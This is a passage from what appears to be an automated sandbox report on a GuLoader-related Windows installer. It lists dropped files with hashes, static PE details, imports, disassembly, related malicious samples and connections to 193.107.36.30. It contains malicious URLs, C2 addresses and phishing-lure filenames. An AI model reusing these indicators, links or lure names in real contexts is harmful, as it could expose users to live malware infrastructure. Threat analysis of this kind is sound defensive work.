                                          https://ipexcel-my.sharepoint.com/:u:/p/bhaskar/EXkHa_fTPjZKq-NlTqXIh7sBrIzBSy8pqbKPLGCEzX2rbAGet hashmaliciousUnknownBrowse
                                          • 185.45.66.155
                                          Arcadia Aerospace Industries LLC (Code qJG7x-ZymK9p-KYuh).htmlGet hashmaliciousUnknownBrowse
                                          • 193.107.36.200

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          37f463bf4616ecd445d4a1937da06e193507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                          • 193.107.36.30
                                          Unlock_Tool_2.3.1.exeGet hashmaliciousVidarBrowse
                                          • 193.107.36.30
                                          3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                          • 193.107.36.30
                                          aZm1EZ2IYr.exeGet hashmaliciousVidarBrowse
                                          • 193.107.36.30
                                          Unlock_Tool_2.4.exeGet hashmaliciousVidarBrowse
                                          • 193.107.36.30
                                          JuyR4wj8av.exeGet hashmaliciousStealc, VidarBrowse
                                          • 193.107.36.30
                                          SecuriteInfo.com.FileRepMalware.4445.21502.exeGet hashmaliciousUnknownBrowse
                                          • 193.107.36.30
                                          yAkRyU2LPe.exeGet hashmaliciousVidarBrowse
                                          • 193.107.36.30
                                          EL7ggW7AdA.exeGet hashmaliciousStealc, VidarBrowse
                                          • 193.107.36.30

                                          Dropped Files

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dll3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                            3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                              Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                                                Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                                                  RICHIESTA_OFFERTA_RDO2400423.docx.docGet hashmaliciousGuLoaderBrowse
                                                    Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                      Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeGet hashmaliciousGuLoaderBrowse
                                                        Nutzen_Unterschrift_Planen#2024.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                          Nutzen_Unterschrift_Planen#2024.com.exeGet hashmaliciousGuLoaderBrowse

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dll

                                                            Download File
                                                            Process:C:\Users\user\Desktop\450707124374000811.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):11776
                                                            Entropy (8bit):5.659026618805001
                                                            Encrypted:false
                                                            SSDEEP:192:eX24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlqSlS:D8QIl972eXqlWBFSt273YOlqz
                                                            MD5:9625D5B1754BC4FF29281D415D27A0FD
                                                            SHA1:80E85AFC5CCCD4C0A3775EDBB90595A1A59F5CE0
                                                            SHA-256:C2F405D7402F815D0C3FADD9A50F0BBBB1BAB9AA38FE347823478A2587299448
                                                            SHA-512:DCE52B640897C2E8DBFD0A1472D5377FA91FB9CF1AEFF62604D014BCCBE5B56AF1378F173132ABEB0EDD18C225B9F8F5E3D3E72434AED946661E036C779F165B
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: 3507071243740008011.exe, Detection: malicious, Browse
                                                            • Filename: 3507071243740008011.exe, Detection: malicious, Browse
                                                            • Filename: Potwierdzenie.exe, Detection: malicious, Browse
                                                            • Filename: Potwierdzenie.exe, Detection: malicious, Browse
                                                            • Filename: RICHIESTA_OFFERTA_RDO2400423.docx.doc, Detection: malicious, Browse
                                                            • Filename: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, Detection: malicious, Browse
                                                            • Filename: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, Detection: malicious, Browse
                                                            • Filename: Nutzen_Unterschrift_Planen#2024.com.exe, Detection: malicious, Browse
                                                            • Filename: Nutzen_Unterschrift_Planen#2024.com.exe, Detection: malicious, Browse
                                                            Reputation:moderate, very likely benign file
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...Y..Y...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Canton.Chr

                                                            Download File
                                                            Process:C:\Users\user\Desktop\450707124374000811.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):283894
                                                            Entropy (8bit):7.702006100164842
                                                            Encrypted:false
                                                            SSDEEP:6144:vhdVvrRbGmvDU6wCxZkgdpQWENGHJCLJqjFaX6ql6ytdwD:vtvrRbGmvrwcZkg8zcHJCLkmt2D
                                                            MD5:D60DE2837DB415CC4F66B85247B99A5B
                                                            SHA1:7C46A763764028D65B812909021A647305772AB0
                                                            SHA-256:3105B5A8590A4AEE190FFAAF4C84D09B123F08DD1B6F34677BBF1BB69AECC716
                                                            SHA-512:36C9CA47DC9E55AC81CB242E7848C91913B3737579F52A39570CF1247770517BAF003812F01999A2B45CC9193FAA85910EBE9B0D1C3E960AC3E1A24D84366101
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.........F.o.%%%...--....................PPPP............./.;;;;;........ppp.....QQ.....55......MMMMM....................k..............SS.00...............................dddd...777..y......V..............p....N..OO.......GGG.....u...G.*........z.L......UUUU..OO........::.--............777....O....................0.++++.H...............".%......................$..........///...k..5...NN....[[.((.4...V...L................**........v...............jj......o............1........................I........../...................[[[[[[........((.4..............\......................YY.%..qq........V......................A.....................666..................//..........................1.........t.w.H......zzz..4444.a..k........#####.ff...........M..............|..........................&&&&.&................cccc....^^..1111..'.YY....zzzz........((.I........GG....................!!!!..mmmmm..C...................................................a....88..........UU....7............@@......

                                                            C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Grundfladernes.Qua

                                                            Download File
                                                            Process:C:\Users\user\Desktop\450707124374000811.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):82981
                                                            Entropy (8bit):4.614849518351854
                                                            Encrypted:false
                                                            SSDEEP:1536:HD0Zl31ONi8ZXxYo6qRyCkWuE78I23R0HEpJQ3Tv:HD0ObxxhcCkxg4QDv
                                                            MD5:12629C74AA6BCA8746FD8DB17EE09A8F
                                                            SHA1:A0EECC9D844403FE34CB19B19AB2CE32202B77F3
                                                            SHA-256:209451B54F4D28E90AE8D1B6A073C1234236CCEE38870399027001F5E9E38908
                                                            SHA-512:930C34FA9C781A8D4EFBB7DAAC625C1AFBB0BECDEC93DF745D0C8F17CB2FEFCA034539668A361AF4F0AA482271C3BD746B18C8BFEC17EFCD2666C8C5187722A7
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:....{{..J.....P..::...................:...CC.1.....OO....}}.++.........III..n...h..........8.-......................,....MMMM.;.:::......}}....<....................SSSS....7..........##....5......^^^.....3....bb................VV........N.}}}...........J........22.v.................kk.....(((((((((((.............e.YYY..............o.....................B.llll...........#....Q.9.000.......]]]......F..........AAAA.g.YY........NNN..........WWW..................%%...............TTT...........A.......i.Y.zzzz....$...........%............t...........x.........a....k........mmmm..u...c....................`.....................gg............'''.......m.ii.........LL.NN.A.............o..........#.. ...###..........!...h..}............^..>......HHHHH...LLL...........}}............................jj...?........%%%%.............c...uu...............>...+....,,...R...d.......???..............f......DD.....................9.........$........O................. .....S......zz.........qq........x..XXX.

                                                            C:\Users\user\AppData\Roaming\pechay\transskribere\jon\img-1.jpg

                                                            Download File
                                                            Process:C:\Users\user\Desktop\450707124374000811.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 999x605, components 3
                                                            Category:dropped
                                                            Size (bytes):167813
                                                            Entropy (8bit):7.749904770387752
                                                            Encrypted:false
                                                            SSDEEP:3072:icF5a5FZl5xa0SYazQR5dRfp3oVadIALnwP5kipQlMXG6g9:5r2x1SYkQR53fpoVABLnwRk0QKXRg9
                                                            MD5:8C0739994C90303B65A05C6909A53B62
                                                            SHA1:E43239AF385F8DED6EA2098D2A71A2AC9519E32B
                                                            SHA-256:7E1835782673A877C8A4FF9A4E9E88A23D8FA54077B6E7E1D70FBDE5F3A9D66B
                                                            SHA-512:65BB94BEE91A5581EC7BEFE758F2AD71235ED07DEDDC5B85F5E5719B62E2ADCEFDFB080C9DC5D5C67BC2DBA846C26B62E8E043DCF33F02F65B9B18FC4942277F
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:......JFIF.....H.H....9Rhttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c034 46.272976, Sat Jan 27 2007 22:37:37 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Make>Canon</tiff:Make>. <tiff:Model>Canon DIGITAL IXUS 800 IS</tiff:Model>. <tiff:Orientation>1</tiff:Orientation>. <tiff:XResolution>72/1</tiff:XResolution>. <tiff:YResolution>72/1</tiff:YResolution>. <tiff:ResolutionUnit>2</tiff:ResolutionUnit>. <tiff:YCbCrPositioning>1</tiff:YCbCrPositioning>. <tiff:Compression>6</tiff:Compression>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:xap="http://ns.adobe.com/xap/1.0/">. <xap:ModifyDate>2008-12-25T21:16:15Z</xap:ModifyDate>. <xap:CreatorTool>Adobe

                                                            C:\Users\user\AppData\Roaming\pechay\transskribere\jon\nannie.tek

                                                            Download File
                                                            Process:C:\Users\user\Desktop\450707124374000811.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):329924
                                                            Entropy (8bit):4.933260234424776
                                                            Encrypted:false
                                                            SSDEEP:6144:sXxDu/qV1rYX0GEETHfS1YHoQccZ6eJ7Myv5CTV:shy/qSu6qJcZFJPBi
                                                            MD5:562A26D4A57C23D2AE8BD4DECE37E771
                                                            SHA1:A9830E759E670EB8D4EFC5320A112E44ECB389BA
                                                            SHA-256:EDF2898EFF5E72AA11993272EB941C1CD992BB6243E4D2F5940BD88EDF9117CD
                                                            SHA-512:50E8291CB30F1916A5FC41EC7A64C9690A5ABD2AA5B56277029AB04EBCA19769DA91C214C4098B7FC5A8E7E048EBACFC9CFD41540F613B65C1BFF92AEAC49496
                                                            Malicious:false
                                                            Preview:......s.......|Xkt........"..y....8W..........6.......g...k.X......G,..........Q...+...M......2....Vr......3....n...q^D.......J.-........l.........&....~.......E,..(d...e.....S......a........J...#............w..).......y.?....b.........\.............u...............y.6....].j..........y......4.......T...x......O7....E.....)...|.J.9..)...5c...^..'.......YA............#t...e.....}.....B......"............K..0...{......Z..,........\....X...D.y........j(...........l......*......0.........j.E6.......................t...................Bm-............N...`..................A..../{...(...hN...............k...X...Y.m...P......^....O?..........C.e........B..b............y..M...P...... y............|....}.8..H..........y................r.oS!.'..G...l.7.*.....q..tO..g.....,..........~.................?..............V.B.........B......n/..j...............e...........0.mo.b......Ix.....=..Q.!..G............Q\4n..........O.br.7....d.nvH.t.....`...b......A.+...1............j....w......T.

                                                            C:\Users\user\AppData\Roaming\pechay\transskribere\jon\nonpendency.age

                                                            Download File
                                                            Process:C:\Users\user\Desktop\450707124374000811.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):48084
                                                            Entropy (8bit):4.914629993393861
                                                            Encrypted:false
                                                            SSDEEP:768:D/rnROkWNBnJ+9RlvYC45nQikaSOn/i7/nY1kakXzsDwft2EwNWBbTvMIQwBT:zrx8BnJ+lyzknku2kakXYDwcEcWbwoBT
                                                            MD5:511E6E568EBCF13D5098054630C627AA
                                                            SHA1:1B5AFC7023C138219737E23B00121C359BF8443F
                                                            SHA-256:204A44F0D3C3B63E36B3A4865C029552CCD8AC1EAD3507456BEC7886D724BA54
                                                            SHA-512:DC3088BA850BA2258715826CF985D417A6A138A9EF66F43EBC69EB18CEDA9F4B65686C3F70E2BA39E64AEB8B55B82F550EE603094F06B988DC122299183075E8
                                                            Malicious:false
                                                            Preview:.................3v......0...........8......n..m....i............d ...... ..........'..MDY...... ...|............-.....|....dt...........G...bC..J............~....?..@........?.k..................z..!........k........................i.......|f.....X.(.......N..X..v....>..e..................J.....T..........3."...p9...r....2........................<..".......qj...i.`.;........a..........v...k.......%.f......os.....,....(.*.....|...#...y.7....,...............c.......i.9H............L..sx...{....=.....N'..\...|.B.....U...&.........B1J<................A....1.....A}\.7.Q........7................K..............C%......8...G....a.................................T.Y.kB.........P............o...&.`....{...{..A.........f....`.........q..............d.............W.......1-...>..R.)s;".e......0..B...].....E........R..............`.......{'...........0...m........._t.........x..............#.p....@_3..j.o............................C......=`...........Nx....Q\......:....A....5...e......~..

                                                            C:\Users\user\AppData\Roaming\pechay\transskribere\jon\rimsmeds.txt

                                                            Download File
                                                            Process:C:\Users\user\Desktop\450707124374000811.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):501
                                                            Entropy (8bit):4.284126845947256
                                                            Encrypted:false
                                                            SSDEEP:12:7Dvz9cWhFxJiWtT/ksqSYLbLGLW+/tbV90QhtdtmCq/oK6:vpJrilbgW+hHfmCq/ol
                                                            MD5:5D2F45598C5DAD8A461CECDA82CA550E
                                                            SHA1:D594FFDAE11463E5E35170D27C611182F16E038C
                                                            SHA-256:65D3114548018688712A3B735E3B9BA63C2261A5DA9B6505D43378DE5E351B87
                                                            SHA-512:BF9654722B7F313B0E5C9A755C0DA9D37930FA517CA43F36C97F6033C7C764ACACDAC8FDE143A9D89D33D9ED7CC4EE08A96A0DEB14D484E4ACB43E830CA15470
                                                            Malicious:false
                                                            Preview:wellcurbs realkreditlaan rhamnoses aluminiumfoliens needlecase gld.bromelin scoters mormoder klinges albigensianism sociolektens curpel shuttles awreck laboratorieopgave eksercerskoler..nonfederated sprinklingers multiplepoinding indfaldsvinkelen korttegnere opinionsmaalingernes exobiology.amazingly palikars accessibility matriarchical erstatningskravene dorns..reclaimant prepubescent unfairest lusiad uhmmedes proctodaeum sydslesvigers.stormwise septaemia rangsforskel flytteligt hardboard dentex,

                                                            C:\Users\user\AppData\Roaming\pechay\transskribere\jon\skreddene.spo

                                                            Download File
                                                            Process:C:\Users\user\Desktop\450707124374000811.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):54488
                                                            Entropy (8bit):4.944297757860882
                                                            Encrypted:false
                                                            SSDEEP:1536:BYkiahV7T7eAwz8ruqJUjhEXVM54+suwGXs:BFiahJTCAi8dQ6M54rWs
                                                            MD5:4ECFFF116FE03C56DAD5B0EAE0279D00
                                                            SHA1:18525703697F059B03F7A1F093317E62BAD43004
                                                            SHA-256:593BF06B816C8CACBA83C6CCECD0C3F0F164C4D9CC7F9B4EA7BF2EA2F0CD7906
                                                            SHA-512:D6EBCD15BEE3AD32BB91D7EFEAB363B917127ACF62A8838E621FFA0F080060E00E06BDACD9F2BDD4BE37DFC1A9449A4CE678BC1821E005BAEC3263272BF8877A
                                                            Malicious:false
                                                            Preview:.... ........a....D..o.X...........&.=...x.....l...w......h.2....D ..............6...V^.~...u.......v...(.......8Q..7.................6....A6.....;..5.T.P......K...I...]...........Bk.....4......4.....'...z....k./.....r......f..8.5....S......T..0......."...x...S........@......(......z.;...H...3'd.d.....{.c..Z...3........|...........].i...2....8.{....0............8.............6...<.@C..r..$3...N=...+..].s...6.........N........y........I..........W....&.........T....}............bd.g................,.......I#..J/...C-.....e...}!..........J..B.P...............{..................8i....$................1.1......[.............>....`4y....A.kA......U........[...dmE..5.......)...e...).....l....T.l......................................`.[....l.N..=...........$....g.... ....Z.<v...?....>...L.o..........D.......&'.*.........2..............k......... 2E... ....KT..2.,.......`.c...........d.E.......<p......!0...I.U....9.._.....a..o5>...............+.....]...P...D....C@..N.........w.hx..

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                            Entropy (8bit):7.7511646883690775
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:450707124374000811.exe
                                                            File size:1'001'467 bytes
                                                            MD5:22aeab62009aaa9073b3159d7da1195e
                                                            SHA1:602dd47b6910a522be90fc47d10d5c26a836a01a
                                                            SHA256:1fc195e3937e7c7d9ca78f9c39f8997d5ed98fe1c608ad5c7b4a01dc24ddd967
                                                            SHA512:057f99c072baf1b2c4aadbf5851ac90288af03d991a2b2732d2d9e3c6856a62cbb3c44416e6fb6f67e193a6e50c79d0afb8f5d61f5d9a39e903f9179850b8286
                                                            SSDEEP:24576:8HANkRMLHpVBNAVC+qTC0otgAhHYGDL4kJiMv:8HANkRMLHf3OC+qTfPGD0aJ
                                                            TLSH:DD251205E3A06467C3F5CBF807A6925B7A3BDC79E641074B0352B76A2A78741F14E3AC
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...~..Y.................f.........

                                                            File Icon

                                                            Icon Hash:c4bcaaec6ceeda31

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x403373
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x597FCC7E [Tue Aug 1 00:34:06 2017 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:b34f154ec913d2d2c435cbd644e91687

                                                            Entrypoint Preview

                                                            Instruction
                                                            sub esp, 000002D4h
                                                            push ebx
                                                            push esi
                                                            push edi
                                                            push 00000020h
                                                            pop edi
                                                            xor ebx, ebx
                                                            push 00008001h
                                                            mov dword ptr [esp+14h], ebx
                                                            mov dword ptr [esp+10h], 0040A2E0h
                                                            mov dword ptr [esp+1Ch], ebx
                                                            call dword ptr [004080A8h]
                                                            call dword ptr [004080A4h]
                                                            and eax, BFFFFFFFh
                                                            cmp ax, 00000006h
                                                            mov dword ptr [00434EECh], eax
                                                            je 00007FBCC88FDF03h
                                                            push ebx
                                                            call 00007FBCC8901199h
                                                            cmp eax, ebx
                                                            je 00007FBCC88FDEF9h
                                                            push 00000C00h
                                                            call eax
                                                            mov esi, 004082B0h
                                                            push esi
                                                            call 00007FBCC8901113h
                                                            push esi
                                                            call dword ptr [00408150h]
                                                            lea esi, dword ptr [esi+eax+01h]
                                                            cmp byte ptr [esi], 00000000h
                                                            jne 00007FBCC88FDEDCh
                                                            push 0000000Ah
                                                            call 00007FBCC890116Ch
                                                            push 00000008h
                                                            call 00007FBCC8901165h
                                                            push 00000006h
                                                            mov dword ptr [00434EE4h], eax
                                                            call 00007FBCC8901159h
                                                            cmp eax, ebx
                                                            je 00007FBCC88FDF01h
                                                            push 0000001Eh
                                                            call eax
                                                            test eax, eax
                                                            je 00007FBCC88FDEF9h
                                                            or byte ptr [00434EEFh], 00000040h
                                                            push ebp
                                                            call dword ptr [00408044h]
                                                            push ebx
                                                            call dword ptr [004082A0h]
                                                            mov dword ptr [00434FB8h], eax
                                                            push ebx
                                                            lea eax, dword ptr [esp+34h]
                                                            push 000002B4h
                                                            push eax
                                                            push ebx
                                                            push 0042B208h
                                                            call dword ptr [00408188h]
                                                            push 0040A2C8h

                                                            Rich Headers

                                                            Programming Language:
                                                            • [EXP] VC++ 6.0 SP5 build 8804

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x86080xa0.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x6a0000x34908.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x65ef0x6600a7ac317f30d043d93d4c5978f973de39False0.6750919117647058data6.514810500836391IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x80000x149a0x1600966a3835fd2d9407261ae78460c26dccFalse0.43803267045454547data5.007075185851696IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0xa0000x2aff80x600d113e76cc1b8c0774c4702688d79d792False0.5162760416666666data4.036693470004838IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .ndata0x350000x350000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x6a0000x349080x34a00d09097303c9883a16609d6cfc168ddcdFalse0.5725671763657957data6.134346545573802IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_BITMAP0x6a4000x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                            RT_ICON0x6a7680x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.39200579675854724
                                                            RT_ICON0x7af900xc890PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9980328762854472
                                                            RT_ICON0x878200x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.46636535631700654
                                                            RT_ICON0x90cc80x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.49302218114602586
                                                            RT_ICON0x961500x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.4863013698630137
                                                            RT_ICON0x9a3780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.46473029045643155
                                                            RT_ICON0x9c9200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.550187617260788
                                                            RT_ICON0x9d9c80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.4095744680851064
                                                            RT_DIALOG0x9de300x144dataEnglishUnited States0.5216049382716049
                                                            RT_DIALOG0x9df780x13cdataEnglishUnited States0.5506329113924051
                                                            RT_DIALOG0x9e0b80x100dataEnglishUnited States0.5234375
                                                            RT_DIALOG0x9e1b80x11cdataEnglishUnited States0.6056338028169014
                                                            RT_DIALOG0x9e2d80xc4dataEnglishUnited States0.5918367346938775
                                                            RT_DIALOG0x9e3a00x60dataEnglishUnited States0.7291666666666666
                                                            RT_GROUP_ICON0x9e4000x76dataEnglishUnited States0.7542372881355932
                                                            RT_VERSION0x9e4780x14cIntel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970EnglishUnited States0.5813253012048193
                                                            RT_MANIFEST0x9e5c80x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384

                                                            Imports

                                                            DLLImport
                                                            KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                            USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                            SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                            ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                            COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                            Possible Origin

                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishUnited States

                                                            Network Behavior

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 20, 2024 19:16:54.749670029 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:54.749706984 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:54.749774933 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:54.760015965 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:54.760037899 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:55.883717060 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:55.883912086 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:55.939806938 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:55.939834118 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:55.940140963 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:55.944122076 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:55.946728945 CEST49974443192.168.2.5193.107.36.30
                                                            Oct 20, 2024 19:16:55.991406918 CEST44349974193.107.36.30192.168.2.5
                                                            Oct 20, 2024 19:16:56.278723955 CEST44349974193.107.36.30192.168.2.5
